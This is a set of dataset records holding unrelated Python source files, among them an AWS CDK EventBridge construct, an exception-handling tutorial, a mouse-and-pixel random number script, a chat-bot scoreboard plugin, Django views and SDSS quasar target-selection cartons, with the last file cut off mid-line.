str,\n event_bus: aws_events.EventBus,\n rule_name: str,\n ) -> None:\n \"\"\"\n :param scope (Construct): The scope in which to define this construct.\n :param id (str): The scoped construct ID. 
Must be unique amongst siblings.\n :param event_bus (aws_events.EventBus): AWS EventBridge Bus resource.\n :param rule_name (str): Name of the EventBridge Rule to create.\n \"\"\"\n super().__init__(scope, id)\n\n self.event_rule = aws_events.Rule(\n self,\n \"EventBridge-Rule\",\n rule_name=rule_name,\n event_pattern=aws_events.EventPattern(\n source=aws_events.Match.prefix(\"\"), # Do not filter anything\n ),\n event_bus=event_bus,\n enabled=True,\n )\n","repo_name":"san99tiago/aws-cdk-multiple-experiments","sub_path":"cross_account_event_notifications/hub_account/stacks/custom_constructs/event_rule_construct.py","file_name":"event_rule_construct.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"3110055422","text":"#Exception\n\n\n#Handling Exception\n\ndef exception1() :\n try:\n x = int(input(\"Enter a number : \"))\n print(\"You entered \" + str(x))\n except ValueError :\n print(\"ooooppppss you got an exception\")\n \n\n'''\noutput\n\n>>> exception1()\nEnter a number : 34\nYou entered 34\n>>> exception1()\nEnter a number : ddn\nooooppppss you got an exception\n\n'''\n\n\n\n\n\n#Multiple Exception\n#default Exception handling\n#Finally block\n\n\ndictionary = {\"1\" : 89 , \"2\" : 45 }\n\nimport sys\n\ndef exception2() :\n try:\n #ValueError\n x = int(input(\"Enter a number : \"))\n print(\"You entered \" + str(x))\n\n #ArithmeticError \n y = 10 / x\n print(\"10 / \" + str(x) + \" = \" + str(y))\n\n #Default\n z = dictionary[\"1exception2()\"]\n print(str(z))\n \n except ValueError :\n print(\"oops you got a ValueError exception\")\n except ArithmeticError :\n print(\"oops! you got an Arithmetic exception\")\n except :\n print(\"default exception \" )\n\n else:\n print(\"In else clause\")\n \n finally :\n print(\"In finally block\")\n \n\n\n\n\n\n\n\n#Raising Exception\n\ndef exception3() :\n try :\n raise NameError(\"Hi there\")\n except NameError:\n print(\"You got an exception\")\n raise\n\n\n\n\n\n\n\n\n#User Defined Exception\n\nclass MyException(Exception):\n def __init__(self, value1, value2):\n self.value = value2\n def __str__(self):\n return \"This will be printed whenever you print exception object \" + str(self.value)\n\ndef exception4() :\n try :\n raise MyException(2*2 , 45)\n except MyException as e:\n print(\"Value \" + str(e.value))\n print(\"you got exception \" + str(e) )\n \n","repo_name":"rajpatel29/Python","sub_path":"0_Exception.py","file_name":"0_Exception.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24746736943","text":"#!/usr/bin/env python\nimport time\nimport random as ra\nimport pyautogui\nfrom threading import Thread \n\nstart_time = time.time()\nA=[] \t\t\t\t\t\t\t\t#Initialize the lists for the coordinates and the RGB values; A = x, B = y\nB=[]\nRed=[]\nGreen=[]\nBlue=[]\n\nprint(\"**********************************************************************************\")\nprint(\"* The Random Generator will run with 10 threads for almost 20 secs, gathering info\")\nprint(\"* including mouse position and RGB values from your screen.\")\nprint(\"* Then it will give you the number out of your entropy\") \nprint(\"* Threads can run parallel to each other so it won't take any longer.\")\nprint(\"* For better results feel free to use your 
Computer\")\nprint(\"**********************************************************************************\")\n\ndef myfunc(i):\n\tran = ra.randrange(20) \t\t\t\t\t\t#Random choice of the seconds each Thread will run for\n\t#print(\"thread: %d will sleep for seconds %d , \\n When it will wake up it will pick the mouse location in random time! \"%(i,ran))\n\ttime.sleep(ran)\t\t\t\t\t\t\t\t#Put the Thread to sleep for ran seconds\n\t\n\tx,y = pyautogui.position()\t\t\t\t\t#Store the screen coordinates.\n\tr,g,bl = pyautogui.pixel(x,y)\t\t\t\t#Store the RGB values of the Pixel at the screen coordinates.\n\t\n\t#print(\"awaken %d with values x=: %d and y: %d\\n\"%(i,x,y))\n\t\n\tA.append(x)\t\t\t\t\t\t\t\t\t#Store the value of x in list A\n\tB.append(y)\t\t\t\t\t\t\t\t\t#Store the value of y in list B\n\tRed.append(r)\t\t\t\t\t\t\t\t#Store the value of r in list Red\n\tGreen.append(g)\t\t\t\t\t\t\t\t#Store the value of g in list Green\n\tBlue.append(bl)\t\t\t\t\t\t\t\t#Store the value of b in list Blue\n\t\n\n\nfor i in range(10):\t\t\t\t\t\t\t\t#From 0 to 9 \n\tt=Thread(target=myfunc, args=(i,))\t\t\t#With myfunc as the target, create i threads\n\tt.start()\n\nfor i in range(0, len(A)):\t\t\t\t\t\t#Convert the List to integer!\n\tA[i] = int(A[i])\n\t\nfor i in range(0, len(B)):\n\tB[i] = int(B[i])\n\t\nfor i in range(0, len(Red)):\n\tRed[i] = int(Red[i])\n\t \nfor i in range(0, len(Green)):\n\tGreen[i] = int(Green[i])\n\t\nfor i in range(0, len(Blue)):\n\tBlue[i] = int(Blue[i])\n\t\n\t\ntime.sleep(20)\t\t\t\t\t\t\t\t\t#Sleep for 20 seconds waiting for the Threads to finish\nRandomNumber= (A + B + Red + Blue +Green)\t\t#add all the lists into one\nSum=sum(RandomNumber)\t\t\t\t\t\t\t#add the data of all the lists into one int\nSumA = sum(A)\t\t\t\t\t\t\t\t\t\t#add the data of list A into one int\nSumB=sum(B)\nSumRed=sum(Red)\nSumGreen=sum(Green)\nSumBlue=sum(Blue)\n\n\n\n#print(*A+B+Red+Blue+Green, sep = \" \")\npick = ra.randrange(5)\n\t\nif pick == 0:\n\tRandom_number = ((Sum*SumA)-2)/10000\t\t\t#Calculation of the Random Number!\nelif pick == 1:\n\tRandom_number = ((Sum*SumB)-2)/10000\nelif pick == 2:\n\tRandom_number = ((Sum*SumRed)-2)/10000\nelif pick == 3:\n\tRandom_number = ((Sum*SumGreen)-2)/10000\nelif pick == 4:\n\tRandom_number = ((Sum*SumBlue)-2)/10000\n\t\t\nend_time = time.time()\n\ntime_value = end_time - start_time\n\n\nprint(\"\\n\")\nprint(\"**********************************************************************************\")\nprint(\"\\t\\t\\tList Values\")\nprint(\"\\n* x values\",*A, sep = \", \")\nprint(\"\\n* y values\",*B, sep = \", \")\nprint(\"\\n* Red values\",*Red, sep = \", \")\nprint(\"\\n* Green values\",*Green, sep = \", \")\nprint(\"\\n* Blue values\",*Blue,sep = \", \")\nprint(\"**********************************************************************************\")\nprint(\"\\n\")\t\nprint(\"**********************************************************************************\")\nprint(\"\\t\\t\\tPrinting Results\")\nprint(\"\\n* Random Number is : %d \\n\"%(Random_number))\nprint(\"* Time the program ran %d seconds\"%time_value)\nprint(\"**********************************************************************************\")\nexit()\n\n\n","repo_name":"giannisjv/Multithreaded-Random-Generator","sub_path":"randgen.py","file_name":"randgen.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"3915761536","text":"#!/usr/bin/env python3\nimport sys\nfrom PIL import Image\n\nimgPath = sys.argv[1]\nimg = Image.open(imgPath)\nimg2 = img.resize((1,1))\ncolor = img2.getpixel((0,0))\nluminance = ( 0.299 * color[0] + 0.587 * color[1] + 0.114 * color[2] )/255\nif (luminance > 0.5):\n print(\"000000FF\")\nelse:\n print(\"FFFFFFFF\")\n","repo_name":"chnhkk/dotfiles-minimal","sub_path":"pywalScript/getLuminance-rgba.py","file_name":"getLuminance-rgba.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26716954664","text":"from nonebot import Bot\nfrom nonebot.internal.adapter import Event\nfrom nonebot.internal.matcher import Matcher\nfrom nonebot_plugin_session import Session\nfrom ssttkkl_nonebot_utils.interceptor.handle_error import handle_error\n\nfrom .mapper.season_user_point_mapper import map_season_user_point\nfrom .mg import matcher_group\nfrom .utils.dep import UserDep, GroupDep, RunningSeasonDep, SessionDep, UnaryArg, SenderUserDep, IsGroupAdminDep\nfrom .utils.general_handlers import require_store_command_args, require_platform_group_id, require_platform_user_id\nfrom .utils.parse import parse_float_or_error\nfrom .utils.send_msg import send_msg\nfrom ..model import Group, User, Season\nfrom ..model.identity import get_platform_group_id\nfrom ..service.season_user_point_service import reset_season_user_point, change_season_user_point_manually\nfrom ..utils.nickname import get_user_nickname\nfrom ..utils.nonebot import default_cmd_start\n\n# ========== 设置用户PT ==========\nset_season_user_point_matcher = matcher_group.on_command(\"设置用户PT\", aliases={\"设置用户pt\", \"设置PT\", \"设置pt\"}, priority=5)\nset_season_user_point_matcher.__help_info__ = f\"{default_cmd_start}设置PT [@<用户>]\"\n\nrequire_store_command_args(set_season_user_point_matcher)\nrequire_platform_group_id(set_season_user_point_matcher)\nrequire_platform_user_id(set_season_user_point_matcher, use_sender_on_group_message=False)\n\n\n@set_season_user_point_matcher.handle()\n@handle_error()\nasync def set_season_user_point_confirm(bot: Bot, matcher: Matcher, session: Session = SessionDep(),\n user: User = UserDep(use_sender=False),\n pt=UnaryArg(parser=lambda x: parse_float_or_error(x, 'PT')),\n group_admin=IsGroupAdminDep()):\n await send_msg(f\"确定设置用户[{await get_user_nickname(bot, user.platform_user_id, get_platform_group_id(session))}]\"\n f\"PT为{pt}吗?(y/n)\")\n await matcher.pause()\n\n\n@set_season_user_point_matcher.handle()\n@handle_error()\nasync def set_season_user_point_end(event: Event, matcher: Matcher,\n group: Group = GroupDep(),\n user: User = UserDep(use_sender=False),\n operator: User = SenderUserDep(),\n season: Season = RunningSeasonDep(),\n pt=UnaryArg(parser=lambda x: parse_float_or_error(x, 'PT'))):\n if event.get_message().extract_plain_text() == 'y':\n sup = await change_season_user_point_manually(season.id,\n group.id, user.id,\n pt,\n operator.id)\n msg = await map_season_user_point(sup, season)\n msg += \"\\n\\n设置用户PT成功\"\n await send_msg(msg)\n else:\n await matcher.finish(\"取消设置用户PT\")\n\n\n# ========== 重置用户PT ==========\nreset_season_user_point_matcher = matcher_group.on_command(\"重置用户PT\", aliases={\"重置用户pt\", \"重置PT\", \"重置pt\"}, priority=5)\nreset_season_user_point_matcher.__help_info__ = f\"{default_cmd_start}重置PT 
[@<用户>]\"\n\nrequire_store_command_args(reset_season_user_point_matcher)\nrequire_platform_group_id(reset_season_user_point_matcher)\nrequire_platform_user_id(reset_season_user_point_matcher, use_sender_on_group_message=False)\n\n\n@reset_season_user_point_matcher.handle()\n@handle_error()\nasync def reset_season_user_point_confirm(bot: Bot, matcher: Matcher, session: Session = SessionDep(),\n user: User = UserDep(use_sender=False),\n group_admin=IsGroupAdminDep()):\n await send_msg(f\"确定重置用户[{await get_user_nickname(bot, user.platform_user_id, get_platform_group_id(session))}]\"\n f\"PT吗?(y/n)\")\n await matcher.pause()\n\n\n@reset_season_user_point_matcher.handle()\n@handle_error()\nasync def reset_season_user_point_end(event: Event, matcher: Matcher,\n group: Group = GroupDep(),\n user: User = UserDep(use_sender=False),\n operator: User = SenderUserDep(),\n season: Season = RunningSeasonDep()):\n if event.get_message().extract_plain_text() == 'y':\n await reset_season_user_point(season.id,\n group.id, user.id,\n operator.id)\n await matcher.send(\"重置用户PT成功\")\n else:\n await matcher.finish(\"取消重置用户PT\")\n","repo_name":"ssttkkl/nonebot-plugin-mahjong-scoreboard","sub_path":"src/nonebot_plugin_mahjong_scoreboard/controller/season_user_point_manage.py","file_name":"season_user_point_manage.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"27620283716","text":"from django.shortcuts import render\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom incidents.models import Incident\nfrom django.db.models import Max,Min,Avg,Sum\nfrom .forms import PersonForm,ContactForm\n\n# Create your views here.\n# two types - function based and class based \n\ndef list_incident(request):\n all_incidents=Incident.objects.all() # select * from incidents_incident \n all_incidents_count=Incident.objects.count() #select count(*) from incidents_incident \n context = {\n 'allincidents' : all_incidents,\n 'incident_count':all_incidents_count\n }\n return render(request,'incidents.html',context)\n\n\ndef list_incident_details(request,id):\n incident_details=Incident.objects.filter(incident_slug=id).select_related()\n context={\n 'incident_details':incident_details\n }\n return render(request,'incident_details.html',context)\n\ndef all_queries(request):\n max_incident_number=Incident.objects.all().aggregate(Max('incident_id'))\n sum_incident_number=Incident.objects.all().aggregate(Sum('incident_id'))\n \n second_largest_row=Incident.objects.order_by('-incident_date')[1]\n \n get_incident = Incident.objects.filter(\n incident_title__istartswith='I',\n incident_category__incident_category_name__startswith='T'\n )\n \n get_distinct_Incident=Incident.objects.distinct('incident_severity').order_by('-incident_severity')\n \n context={\n 'max_incident_number':max_incident_number,\n 'sum_incident_number':sum_incident_number,\n 'second_largest_row':second_largest_row,\n 'get_incident':get_incident,\n 'get_distinct_Incident':get_distinct_Incident\n }\n \n return render(request,'allqueries.html',context)\n\ndef personform(request):\n if request.method == 'POST':\n form=PersonForm(request.POST)\n if form.is_valid():\n print(form.cleaned_data)\n return HttpResponseRedirect('/incidents/')\n else:\n form=PersonForm()\n \n return render(request,'person/personform.html',{'pform':form})\n\n\ndef contactform(request):\n if request.method == 'POST':\n form=ContactForm(request.POST)\n print(form)\n if form.is_valid():\n 
print(form.cleaned_data)\n            form.save()\n            return HttpResponse('you are successfully submitted')\n       \n    else:\n        form=ContactForm()\n    \n    return render(request,'person/contactform.html',{'cform':form})\n    \n    \n\n\n\n","repo_name":"iampython-team/Django-IMS","sub_path":"IMS_Project/incidents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"31762983102","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# @Author: Tom Dwelly\n# @Date: 2020-03-03\n# @Filename: bhm_aqmes.py\n# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)\n\n# isort: skip_file\n\nimport peewee\n# from peewee import JOIN\n# from peewee import fn\nfrom astropy.io import fits\nimport pkg_resources\n\n\nfrom sdssdb.peewee.sdss5db.catalogdb import (\n    Catalog,\n    SDSS_DR19p_Speclite,\n    SDSS_DR16_QSO,\n    CatalogFromSDSS_DR19p_Speclite,\n)\n\n# DEBUG STUFF TO USE TEMP TABLE\n# CatalogToSDSS_DR19p_Speclite._meta.table_name = 'temp_catalog_to_sdss_dr19p_speclite'\n# CatalogToSDSS_DR19p_Speclite._meta._schema = 'sandbox'\n\nfrom target_selection.cartons.base import BaseCarton\n\n# this should probably live in a better place\nradius_apo = 1.49  # degrees\n\n# Details: Start here\n# https://wiki.sdss.org/display/OPS/Defining+target+selection+and+cadence+algorithms#Definingtargetselectionandcadencealgorithms-AQMES-medium-inprogress  # noqa: E501\n\n# This provides the following BHM cartons:\n# bhm_aqmes_med\n# bhm_aqmes_med_faint\n# bhm_aqmes_wide2\n# bhm_aqmes_wide2_faint\n# # bhm_aqmes_wide3  # dumped in v0.5\n# # bhm_aqmes_wide3-faint  # dumped in v0.5\n# bhm_aqmes_bonus_dark\n# bhm_aqmes_bonus_bright\n\n# how do we relate the cadence names in v0.5, 1.0 to cadence names in v0?\n\ncadence_map_v0p5_to_v0 = {\n    'dark_10x4': 'bhm_aqmes_medium_10x4',\n    'dark_10x4_4yr': 'bhm_aqmes_medium_10x4',\n    # 'dark_3x4': 'bhm_aqmes_wide_3x4',\n    'dark_2x4': 'bhm_aqmes_wide_2x4',\n    'dark_1x4': 'bhm_spiders_1x4',\n    'bright_3x1': 'bhm_boss_bright_3x1',\n}\ncadence_map_v1_to_v0 = {\n    'dark_10x4': 'bhm_aqmes_medium_10x4',\n    'dark_10x4_4yr': 'bhm_aqmes_medium_10x4',\n    'dark_2x4': 'bhm_aqmes_wide_2x4',\n    'dark_1x4': 'bhm_spiders_1x4',\n    'dark_flexible_2x2': 'bhm_spiders_1x4',\n    'bright_3x1': 'bhm_boss_bright_3x1',\n    'bright_flexible_2x1': 'bhm_boss_bright_2x1',\n}\n\n\nclass BhmAqmesBaseCarton(BaseCarton):\n\n    '''\n    Parent class that provides the underlying selections for all AQMES cartons\n    '''\n\n    name = 'bhm_aqmes_base'\n    category = 'science'\n    mapper = 'BHM'\n    program = 'bhm_aqmes'\n    instrument = 'BOSS'\n    inertial = True\n    tile = False\n    priority = None\n    alias_c = None\n    alias_t = None\n    alias_c2s = None\n    cadence = None\n    cadence_v0p5 = None\n\n    # read the AQMES field centres from a fits file and convert to a list of dicts\n    def get_fieldlist(self, cadence_v1=None):\n        stub = self.parameters.get('fieldlist', None)\n        if stub is None or stub == '' or stub == 'None':\n            return None\n\n        # filename = pkg_resources.resource_filename( __name__, stub)\n        filename = pkg_resources.resource_filename('target_selection', stub)\n        assert len(filename) > 0\n\n        try:\n            hdul = fits.open(filename)\n        except BaseException:\n            raise Exception(f\"Failed to find/open fieldlist file: {filename}\")\n\n        assert len(hdul[1].data) > 0\n\n        # choose the correct subset of fields based on the cadence name and form a list of dicts\n        # we have to use the v0 cadence names though\n        assert cadence_v1 in cadence_map_v1_to_v0\n        
cadence_v0 = cadence_map_v1_to_v0[cadence_v1]\n\n try:\n fieldlist = [\n {'racen': r['RACEN'],\n 'deccen': r['DECCEN'],\n 'radius': radius_apo, }\n for r in hdul[1].data\n if r['CADENCE'] == cadence_v0\n ]\n except BaseException:\n raise Exception(f\"Error interpreting contents of fieldlist file: {filename}\")\n\n assert len(fieldlist) > 0\n\n return fieldlist\n\n def append_spatial_query(self, query, fieldlist):\n '''Extend the peewee query using a list of field centres'''\n if fieldlist is None:\n return query\n elif len(fieldlist) == 0:\n return query\n\n q = False\n for f in fieldlist:\n q = (q | peewee.fn.q3c_radial_query(self.alias_c.ra,\n self.alias_c.dec,\n f['racen'],\n f['deccen'],\n f['radius']))\n return query.where(q)\n\n # main query\n def build_query(self, version_id, query_region=None):\n c = Catalog.alias()\n c2s = CatalogFromSDSS_DR19p_Speclite.alias()\n s = SDSS_DR19p_Speclite.alias()\n t = SDSS_DR16_QSO.alias()\n self.alias_c = c\n self.alias_t = t\n self.alias_c2s = c2s\n\n # set the Carton priority+values here - read from yaml\n priority_floor = peewee.Value(int(self.parameters.get('priority', 999999)))\n value = peewee.Value(self.parameters.get('value', 1.0)).cast('float')\n instrument = peewee.Value(self.instrument)\n inertial = peewee.Value(self.inertial).cast('bool')\n opt_prov = peewee.Value('sdss_psfmag')\n # for v1 read cadence from param file rather than from class code\n cadence_v1 = self.parameters.get('cadence', 'unknown')\n cadence = peewee.Value(cadence_v1).cast('text')\n cadence_v0 = peewee.Value(cadence_map_v1_to_v0[cadence_v1]).cast('text')\n # cadence_v0 = peewee.Value(cadence_map_v0p5_to_v0[self.cadence_v0p5]).cast('text')\n # cadence = peewee.Value(self.cadence_v0p5).cast('text')\n\n priority = priority_floor\n\n magnitude_sdss_g = peewee.Case(\n None, ((t.psfmag[1].between(0.1, 29.9), t.psfmag[1]),), 'NaN').cast('float')\n magnitude_sdss_r = peewee.Case(\n None, ((t.psfmag[2].between(0.1, 29.9), t.psfmag[2]),), 'NaN').cast('float')\n magnitude_sdss_i = peewee.Case(\n None, ((t.psfmag[3].between(0.1, 29.9), t.psfmag[3]),), 'NaN').cast('float')\n magnitude_sdss_z = peewee.Case(\n None, ((t.psfmag[4].between(0.1, 29.9), t.psfmag[4]),), 'NaN').cast('float')\n magnitude_gaia_g = peewee.Case(\n None, ((t.gaia_g_mag.between(0.1, 29.9), t.gaia_g_mag),), 'NaN').cast('float')\n magnitude_gaia_bp = peewee.Case(\n None, ((t.gaia_bp_mag.between(0.1, 29.9), t.gaia_bp_mag),), 'NaN').cast('float')\n magnitude_gaia_rp = peewee.Case(\n None, ((t.gaia_rp_mag.between(0.1, 29.9), t.gaia_rp_mag),), 'NaN').cast('float')\n\n query = (\n c.select(\n c.catalogid,\n t.pk.alias('dr16q_pk'), # extra\n s.pk.alias('dr19p_pk'), # extra\n c.ra, # extra\n c.dec, # extra\n t.ra.alias('dr16q_ra'), # extra\n t.dec.alias('dr16q_dec'), # extra\n priority.alias('priority'),\n value.alias('value'),\n inertial.alias('inertial'),\n instrument.alias('instrument'),\n cadence.alias('cadence'),\n cadence_v0.alias('cadence_v0'), # extra\n opt_prov.alias('optical_prov'),\n magnitude_sdss_g.alias('g'),\n magnitude_sdss_r.alias('r'),\n magnitude_sdss_i.alias('i'),\n magnitude_sdss_z.alias('z'),\n magnitude_gaia_g.alias('gaia_g'),\n magnitude_gaia_bp.alias('bp'),\n magnitude_gaia_rp.alias('rp'),\n t.plate.alias('dr16q_plate'), # extra\n t.mjd.alias('dr16q_mjd'), # extra\n t.fiberid.alias('dr16q_fiberid'), # extra\n t.gaia_ra.alias(\"dr16q_gaia_ra\"), # extra\n t.gaia_dec.alias(\"dr16q_gaia_dec\"), # extra\n t.sdss2gaia_sep.alias(\"dr16q_sdss2gaia_sep\"), # extra\n t.z.alias(\"dr16q_redshift\"), # 
extra\n c2s.best.alias(\"c2s_best\"), # extra\n s.pk.alias(\"s19p_pk\"), # extra\n s.specprimary.alias(\"s19p_specprimary\"), # extra\n )\n .join(c2s)\n .join(s)\n .join(\n t,\n on=((s.plate == t.plate) &\n (s.mjd == t.mjd) &\n (s.fiberid == t.fiberid))\n )\n .where(\n c.version_id == version_id,\n c2s.version_id == version_id,\n c2s.best >> True, # TODO check this is working in v1.0\n # # - this condition killed many AQMES\n # # targets in v0+v0.5 cross-matches\n )\n .where\n (\n t.psfmag[3] >= self.parameters['mag_i_min'],\n t.psfmag[3] < self.parameters['mag_i_max'],\n )\n # .distinct([t.pk]) # avoid duplicates - trust the QSO parent sample\n .distinct([c.catalogid]) # avoid duplicates - trust the catalog\n )\n\n query = self.append_spatial_query(query, self.get_fieldlist(cadence_v1))\n\n return query\n\n\n# -------AQMES medium section ------ #\n\n\nclass BhmAqmesMedCarton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso\n WHERE psfmag_i BETWEEN 16.x AND 19.1\n AND {target lies in spatial selection}\n '''\n name = 'bhm_aqmes_med'\n # cadence_v0p5 = 'dark_10x4_4yr'\n\n # TD's note to self:\n # add something like the following if want to add carton-specific selections\n # def build_query(self, version_id, query_region=None):\n # query = super().build_query(version_id, query_region)\n # query = query.where( # .... add extra terms here\n # )\n # return query\n\n\nclass BhmAqmesMedFaintCarton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso\n WHERE psfmag_i BETWEEN 19.1 AND 21.0\n AND {target lies in spatial selection}\n '''\n name = 'bhm_aqmes_med_faint'\n # cadence_v0p5 = 'dark_10x4_4yr'\n program = 'bhm_filler'\n\n# -------AQMES medium section ----- #\n#\n#\n\n#\n# -------AQMES wide section ------ #\n\n\n# class BhmAqmesWide3Carton(BhmAqmesBaseCarton):\n# '''\n# SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 16.0 AND 19.1\n# '''\n# name = 'bhm_aqmes_wide3'\n# cadence_v0p5 = 'dark_3x4'\n#\n#\n# class BhmAqmesWide3FaintCarton(BhmAqmesBaseCarton):\n# '''\n# SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 19.1 AND 21.0\n# '''\n# name = 'bhm_aqmes_wide3_faint'\n# cadence_v0p5 = 'dark_3x4'\n# program = 'bhm_filler'\n\n\nclass BhmAqmesWide2Carton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 16.0 AND 19.1\n '''\n name = 'bhm_aqmes_wide2'\n # cadence_v0p5 = 'dark_2x4'\n\n\nclass BhmAqmesWide2FaintCarton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 19.1 AND 21.0\n '''\n name = 'bhm_aqmes_wide2_faint'\n # cadence_v0p5 = 'dark_2x4'\n program = 'bhm_filler'\n\n# -------AQMES wide section ------ #\n\n\n# -------AQMES bonus section ------ #\n\nclass BhmAqmesBonusCoreCarton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 16.0 AND 19.1\n {NO spatial constraint}\n '''\n name = 'bhm_aqmes_bonus_core'\n # cadence_v0p5 = 'dark_1x4'\n program = 'bhm_filler'\n\n\nclass BhmAqmesBonusFaintCarton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 19.1 AND 21.0\n '''\n name = 'bhm_aqmes_bonus_faint'\n # cadence_v0p5 = 'dark_1x4'\n program = 'bhm_filler'\n\n\nclass BhmAqmesBonusBrightCarton(BhmAqmesBaseCarton):\n '''\n SELECT * FROM sdss_dr16_qso WHERE psfmag_i BETWEEN 14.0 AND 18.0\n '''\n name = 'bhm_aqmes_bonus_bright'\n # cadence_v0p5 = 'bright_3x1'\n program = 'bhm_filler'\n\n# ------- AQMES bonus section ------ 
#\n","repo_name":"sdss/target_selection","sub_path":"python/target_selection/cartons/bhm_aqmes.py","file_name":"bhm_aqmes.py","file_ext":"py","file_size_in_byte":11674,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"1591060846","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Distributed under the terms of the MIT License.\n\n\"\"\"\nScript to extract all independant cages from a CIF using pyWindow code.\n\nAuthor: Andrew Tarzia\n\nDate Created: 04 Apr 2019\n\n\"\"\"\n\nimport sys\nimport atools\n\n\ndef main():\n if (not len(sys.argv) == 2):\n print(\"\"\"\nUsage: extract_indep_cages.py CIF\n CIF (str) - name of CIF to analyze\n \"\"\")\n sys.exit()\n else:\n CIF = sys.argv[1]\n\n if CIF[-4:] != '.cif':\n raise Exception('input file: {} was not a CIF'.format(CIF))\n\n pdb_file, struct = atools.convert_CIF_2_PDB(CIF)\n if pdb_file is None and struct is None:\n sys.exit()\n rebuilt_structure = atools.modularize(file=pdb_file)\n if rebuilt_structure is None:\n # handle pyWindow failure\n sys.exit(f'pyWindow failure on {pdb_file}')\n res = atools.analyze_rebuilt(rebuilt_structure, file_prefix=CIF.rstrip('.cif'),\n atom_limit=20, include_coms=False, verbose=False)\n print('===================================================')\n print('Results of pyWindow analysis on all indep cages:')\n print('===================================================')\n for i in res:\n try:\n print('cage {}:'.format(i))\n print('has {} windows of diameter:'.format(len(res[i][1]['diameters'])))\n print(res[i][1]['diameters'])\n except TypeError:\n print(res[i])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"andrewtarzia/cage_collect","sub_path":"extract_indep_cages.py","file_name":"extract_indep_cages.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69861275346","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom matplotlib.gridspec import GridSpec\nfrom matplotlib.colors import ListedColormap\n\nfrom multiprocessing import Pool\nfrom time import time\n\nimport TMM\n\nmatplotlib.rcParams.update({'font.size': 7})\nmatplotlib.rcParams.update({'axes.linewidth': 0.5})\nmatplotlib.rcParams.update({'ytick.direction': 'in'})\nmatplotlib.rcParams.update({'xtick.direction': 'in'})\nmatplotlib.rcParams.update({'ytick.major.width': 0.5})\nmatplotlib.rcParams.update({'xtick.major.width': 0.5})\nmatplotlib.rcParams.update({'ytick.minor.width': 0.5})\nmatplotlib.rcParams.update({'xtick.minor.width': 0.5})\nmatplotlib.rcParams.update({'figure.figsize': [3.375 *2, 2.5 * 1.8]})\nmatplotlib.rcParams.update({'savefig.pad_inches': 0.02}) #default 0.1\nmatplotlib.rcParams.update({'savefig.format': 'png'}) #default 0.1\nmatplotlib.rcParams.update({'figure.subplot.bottom': 0.05,\n 'figure.subplot.hspace': 0,\n 'figure.subplot.left': 0.05,\n 'figure.subplot.right': 0.95,\n 'figure.subplot.top': 0.95,\n 'figure.subplot.wspace': 0}) #default 0.125, 0.2, 0.125, 0.9, 0.88, 0.2\n\n\n\n\n#%% Design\n\na = 1\nomega_b = 2*np.pi / a\ndt = a *0.01 \n\nTp = 20\n\ntau = np.arange(-(Tp)*a, (Tp)*a+dt/10, dt)\n\ndelta = 0.01 / Tp\nomega = np.linspace(-3*omega_b, 3*omega_b, 3001)\ndomega = omega[1]-omega[0]\n\n\nN_list = 11\nA = 105*np.pi / (256*omega_b)\nS0 = (16/7)*A * np.linspace(0,1,N_list)\ncoeff_b = S0/16\ncoeff_a = (A-7*coeff_b)/4\n\nS_list = (np.abs(omega/omega_b)<2).reshape(1,-1) * 
((4-(omega/omega_b)**2)**2).reshape(1,-1) * (coeff_a.reshape(-1,1)@ ((omega/omega_b)**2).reshape(1,-1) + coeff_b.reshape(-1,1))\nS_fw_list = S_list * (delta**2) # Time structure factor for controling of forward scattering (Eq S35)\nR_fw_list = np.real([np.sum([s*np.exp(-1j*om*tau)*domega/(2*np.pi) for s, om in zip(S, omega)], axis=0) for S in S_fw_list])\n\n\nA = 20*np.pi/(27 * omega_b)\nS2w = 4*A/5 * np.linspace(0, 1, N_list)\ncoeff_b = S2w/4\ncoeff_a = (A - 5*coeff_b)/2\nS_list = ((np.abs(omega/omega_b)<3)* (omega/omega_b)**2 * (3 - np.abs(omega)/omega_b)).reshape(1,-1) * (coeff_a.reshape(-1,1)@((np.abs(omega/omega_b)-2)**2).reshape(1,-1) + coeff_b.reshape(-1,1) )\nS_bw_list = S_list * (delta**2) # Time structure factor for controling of backward scattering (Eqs S36 and S37)\nR_bw_list = np.real([np.sum([s*np.exp(-1j*om*tau)*domega/(2*np.pi) for s, om in zip(S, omega)], axis=0) for S in S_bw_list])\n\n\nt_idx = np.arange(-round(Tp/dt), 0)\nRcenter_idx = np.argmin(np.abs(tau))\n\n\ndef 